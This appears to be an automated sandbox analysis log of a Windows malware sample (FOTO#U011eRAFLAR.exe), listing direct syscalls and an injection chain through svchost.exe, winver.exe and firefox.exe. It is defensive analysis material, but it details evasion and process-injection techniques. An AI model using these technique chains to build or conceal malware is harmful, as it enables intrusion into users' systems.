                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386CA24 mov eax, dword ptr fs:[00000030h]1_2_0386CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385EA2E mov eax, dword ptr fs:[00000030h]1_2_0385EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03854A35 mov eax, dword ptr fs:[00000030h]1_2_03854A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03854A35 mov eax, dword ptr fs:[00000030h]1_2_03854A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]1_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]1_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]1_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]1_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]1_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]1_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]1_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840A5B mov eax, dword ptr fs:[00000030h]1_2_03840A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840A5B mov eax, dword ptr fs:[00000030h]1_2_03840A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386CA6F mov eax, dword ptr fs:[00000030h]1_2_0386CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386CA6F mov eax, dword ptr fs:[00000030h]1_2_0386CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386CA6F mov eax, dword ptr fs:[00000030h]1_2_0386CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DEA60 mov eax, dword ptr fs:[00000030h]1_2_038DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038ACA72 mov eax, dword ptr fs:[00000030h]1_2_038ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038ACA72 mov eax, dword ptr fs:[00000030h]1_2_038ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038309AD mov eax, dword ptr fs:[00000030h]1_2_038309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038309AD mov eax, dword ptr fs:[00000030h]1_2_038309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B89B3 mov esi, dword ptr fs:[00000030h]1_2_038B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B89B3 mov eax, dword ptr fs:[00000030h]1_2_038B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B89B3 mov eax, dword ptr fs:[00000030h]1_2_038B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C69C0 mov eax, dword ptr fs:[00000030h]1_2_038C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A9D0 mov eax, dword ptr fs:[00000030h]1_2_0383A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A9D0 mov eax, dword ptr fs:[00000030h]1_2_0383A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A9D0 mov eax, dword ptr fs:[00000030h]1_2_0383A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A9D0 mov eax, dword ptr fs:[00000030h]1_2_0383A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A9D0 mov eax, dword ptr fs:[00000030h]1_2_0383A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A9D0 mov eax, dword ptr fs:[00000030h]1_2_0383A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038649D0 mov eax, dword ptr fs:[00000030h]1_2_038649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FA9D3 mov eax, dword ptr fs:[00000030h]1_2_038FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BE9E0 mov eax, dword ptr fs:[00000030h]1_2_038BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038629F9 mov eax, dword ptr fs:[00000030h]1_2_038629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038629F9 mov eax, dword ptr fs:[00000030h]1_2_038629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE908 mov eax, dword ptr fs:[00000030h]1_2_038AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE908 mov eax, dword ptr fs:[00000030h]1_2_038AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BC912 mov eax, dword ptr fs:[00000030h]1_2_038BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03828918 mov eax, dword ptr fs:[00000030h]1_2_03828918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03828918 mov eax, dword ptr fs:[00000030h]1_2_03828918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B892A mov eax, dword ptr fs:[00000030h]1_2_038B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C892B mov eax, dword ptr fs:[00000030h]1_2_038C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B0946 mov eax, dword ptr fs:[00000030h]1_2_038B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904940 mov eax, dword ptr fs:[00000030h]1_2_03904940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03856962 mov eax, dword ptr fs:[00000030h]1_2_03856962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03856962 mov eax, dword ptr fs:[00000030h]1_2_03856962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03856962 mov eax, dword ptr fs:[00000030h]1_2_03856962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0387096E mov eax, dword ptr fs:[00000030h]1_2_0387096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0387096E mov edx, dword ptr fs:[00000030h]1_2_0387096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0387096E mov eax, dword ptr fs:[00000030h]1_2_0387096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D4978 mov eax, dword ptr fs:[00000030h]1_2_038D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D4978 mov eax, dword ptr fs:[00000030h]1_2_038D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BC97C mov eax, dword ptr fs:[00000030h]1_2_038BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830887 mov eax, dword ptr fs:[00000030h]1_2_03830887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BC89D mov eax, dword ptr fs:[00000030h]1_2_038BC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E8C0 mov eax, dword ptr fs:[00000030h]1_2_0385E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039008C0 mov eax, dword ptr fs:[00000030h]1_2_039008C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FA8E4 mov eax, dword ptr fs:[00000030h]1_2_038FA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C8F9 mov eax, dword ptr fs:[00000030h]1_2_0386C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C8F9 mov eax, dword ptr fs:[00000030h]1_2_0386C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BC810 mov eax, dword ptr fs:[00000030h]1_2_038BC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03852835 mov eax, dword ptr fs:[00000030h]1_2_03852835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03852835 mov eax, dword ptr fs:[00000030h]1_2_03852835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03852835 mov eax, dword ptr fs:[00000030h]1_2_03852835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03852835 mov ecx, dword ptr fs:[00000030h]1_2_03852835
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D70AA6 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00D70AA6
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D425B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D425B2
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D307BF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D307BF
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D30955 SetUnhandledExceptionFilter,0_2_00D30955
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D30BA1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00D30BA1

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeNtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeNtClose: Direct from: 0x76EF7B2E
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\winver.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: NULL target: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: NULL target: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeThread register set: target process: 8024Jump to behavior
                Source: C:\Windows\SysWOW64\winver.exeThread APC queued: target process: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeJump to behavior
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2FCC008Jump to behavior
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D71145 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00D71145
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D1445D GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00D1445D
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D2EFAD GetForegroundWindow,FindWindowW,IsIconic,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,ShowWindow,0_2_00D2EFAD
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D7E2D7 mouse_event,0_2_00D7E2D7
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\FOTO#U011eRAFLAR.exe"Jump to behavior
                Source: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exeProcess created: C:\Windows\SysWOW64\winver.exe "C:\Windows\SysWOW64\winver.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\winver.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D70AA6 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00D70AA6
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D715A7 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00D715A7
                Source: FOTO#U011eRAFLAR.exeBinary or memory string: @EXITMETHOD@EXITCODEShell_TrayWnd%s#comments-end#ceCALLGUICTRLREGISTERLISTVIEWSORTGUICTRLCREATELISTVIEWITEMGUICTRLCREATETREEVIEWITEMGUICTRLCREATECONTEXTMENUONAUTOITEXITUNREGISTERGUICTRLCREATELISTVIEWGUICTRLCREATEMENUITEMGUICTRLCREATECHECKBOXGUICTRLCREATEMONTHCALGUICTRLCREATEPROGRESSGUICTRLCREATETREEVIEWGUICTRLCREATEGRAPHICSTRINGFROMASCIIARRAYONAUTOITEXITREGISTERGUICTRLCREATETABITEMGUICTRLSETDEFBKCOLORINIREADSECTIONNAMESGUICTRLCREATEBUTTONDLLCALLBACKREGISTERGUICTRLCREATEUPDOWNGUICTRLCREATESLIDERSTRINGREGEXPREPLACEOBJCREATEINTERFACEGUICTRLSENDTODUMMYFILECREATESHORTCUTGUICTRLCREATEINPUTSOUNDSETWAVEVOLUMEFILECREATENTFSLINKGUISETACCELERATORSGUICTRLCREATECOMBOGUICTRLSETDEFCOLORPROCESSSETPRIORITYGUICTRLSETRESIZINGSTRINGTOASCIIARRAYDRIVEGETFILESYSTEMGUICTRLCREATEDUMMYTRAYITEMSETONEVENTGUICTRLCREATERADIOWINMINIMIZEALLUNDOGUICTRLCREATEGROUPGUICTRLCREATELABELAUTOITWINSETTITLEGUICTRLSETBKCOLORAUTOITWINGETTITLEGUICTRLSETGRAPHICGUICTRLCREATEDATEGUICTRLCREATEICONGUICTRLSETONEVENTCONSOLEWRITEERRORDLLCALLBACKGETPTRGUICTRLCREATELISTTRAYITEMGETHANDLEFILEFINDFIRSTFILEGUICTRLCREATEEDITGUICTRLCREATEMENUWINMENUSELECTITEMGUICTRLSETCURSORDLLSTRUCTGETDATASTATUSBARGETTEXTFILERECYCLEEMPTYFILESELECTFOLDERTRAYITEMSETSTATEDLLSTRUCTSETDATATRAYITEMGETSTATEWINGETCLIENTSIZEGUICTRLCREATEAVIHTTPSETUSERAGENTGUICTRLCREATEPICCONTROLGETHANDLEGUIGETCURSORINFOTRAYSETPAUSEICONFILEFINDNEXTFILEINIRENAMESECTIONDLLSTRUCTGETSIZESHELLEXECUTEWAITPROCESSWAITCLOSEGUICTRLCREATETABFILEGETSHORTNAMEWINWAITNOTACTIVEGUICTRLCREATEOBJGUICTRLGETHANDLESTRINGTRIMRIGHTGUICTRLSETLIMITGUICTRLSETIMAGEINIWRITESECTIONCONTROLTREEVIEWAUTOITSETOPTIONGUICTRLSETCOLORDLLSTRUCTGETPTRADLIBUNREGISTERDRIVESPACETOTALGUICTRLSETSTATEWINGETCLASSLISTGUICTRLGETSTATEFILEGETSHORTCUTDLLSTRUCTCREATEPROCESSGETSTATSCONTROLGETFOCUSDLLCALLBACKFREEGUICTRLSETSTYLEFILEREADTOARRAYTRAYITEMSETTEXTCONTROLLISTVIEWTRAYITEMGETTEXTFILEGETENCODINGFILEGETLONGNAMEGUICTRLSENDMSGSENDKEEPACTIVEDRIVESPACEFREEFILEOPENDIALOGGUICTRLRECVMSGCONTROLCOMMANDSTRINGTOBINARYWINMINIMIZEALLSTRINGISXDIGITTRAYSETONEVENTFILESAVEDIALOGDUMMYSPEEDTESTCONTROLGETTEXTMOUSECLICKDRAGGUICTRLSETFONTMOUSEGETCURSORWINGETCARETPOSCONTROLSETTEXTTRAYITEMDELETESTRINGTRIMLEFTDRIVEGETSERIALBINARYTOSTRINGGUICTRLSETDATAINIREADSECTIONUDPCLOSESOCKETCONTROLDISABLETRAYCREATEMENUTCPCLOSESOCKETDLLCALLADDRESSFILEGETVERSIONGUIREGISTERMSGTRAYSETTOOLTIPTRAYCREATEITEMDRIVEGETDRIVESTRINGISASCIISTRINGCOMPARESTRINGISALPHAPROCESSEXISTSSTRINGREVERSESTRINGSTRIPCRSPLASHIMAGEONGUICTRLSETTIPGUISTARTGROUPCONTROLGETPOSFILEGETATTRIBADLIBREGISTERDRIVESETLABELGUICTRLDELETEFILECHANGEDIRFILEWRITELINEPIXELCHECKSUMDRIVEGETLABELGUICTRLSETPOSGUISETBKCOLORPIXELGETCOLORSTRINGISDIGITSTRINGISFLOATWINWAITACTIVESTRINGISALNUMSTRINGISLOWERSTRINGISSPACEGUISETONEVENTSTRINGREPLACESTRINGSTRIPWSCONTROLENABLESTRINGISUPPERWINGETPROCESSFILESETATTRIBCONTROLFOCUSFILEREADLINEPROCESSCLOSEGUISETCURSORSPLASHTEXTONSTRINGFORMATTRAYSETSTATESTRINGREGEXPCONTROLCLICKSHELLEXECUTETRAYSETCLICKWINWAITCLOSEHTTPSETPROXYDRIVEGETTYPEWINGETHANDLECONSOLEWRITEG
